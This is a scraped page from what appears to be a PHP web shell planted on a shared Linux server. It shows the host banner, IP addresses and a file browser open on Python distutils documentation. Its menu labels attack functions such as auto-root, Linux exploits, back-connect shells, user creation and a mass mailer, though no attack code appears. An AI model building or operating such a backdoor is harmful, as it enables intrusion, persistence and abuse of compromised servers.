Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
python3.10 /
html /
_sources /
distutils /
[ HOME SHELL ]
Name
Size
Permission
Action
_setuptools_disclaimer.rst.txt
239
B
-rw-r--r--
apiref.rst.txt
94.64
KB
-rw-r--r--
builtdist.rst.txt
19.22
KB
-rw-r--r--
commandref.rst.txt
4.48
KB
-rw-r--r--
configfile.rst.txt
5.92
KB
-rw-r--r--
examples.rst.txt
10.15
KB
-rw-r--r--
extending.rst.txt
4.46
KB
-rw-r--r--
index.rst.txt
1.5
KB
-rw-r--r--
introduction.rst.txt
7.87
KB
-rw-r--r--
packageindex.rst.txt
448
B
-rw-r--r--
setupscript.rst.txt
30.47
KB
-rw-r--r--
sourcedist.rst.txt
9.73
KB
-rw-r--r--
uploading.rst.txt
226
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.rst.txt
.. _distutils-index: ############################################## Distributing Python Modules (Legacy version) ############################################## :Authors: Greg Ward, Anthony Baxter :Email: distutils-sig@python.org .. seealso:: :ref:`distributing-index` The up to date module distribution documentations .. note:: The entire ``distutils`` package has been deprecated and will be removed in Python 3.12. This documentation is retained as a reference only, and will be removed with the package. See the :ref:`What's New <distutils-deprecated>` entry for more information. .. include:: ./_setuptools_disclaimer.rst .. note:: This guide only covers the basic tools for building and distributing extensions that are provided as part of this version of Python. Third party tools offer easier to use and more secure alternatives. Refer to the `quick recommendations section <https://packaging.python.org/guides/tool-recommendations/>`__ in the Python Packaging User Guide for more information. This document describes the Python Distribution Utilities ("Distutils") from the module developer's point of view, describing the underlying capabilities that ``setuptools`` builds on to allow Python developers to make Python modules and extensions readily available to a wider audience. .. toctree:: :maxdepth: 2 :numbered: introduction.rst setupscript.rst configfile.rst sourcedist.rst builtdist.rst examples.rst extending.rst commandref.rst apiref.rst
Close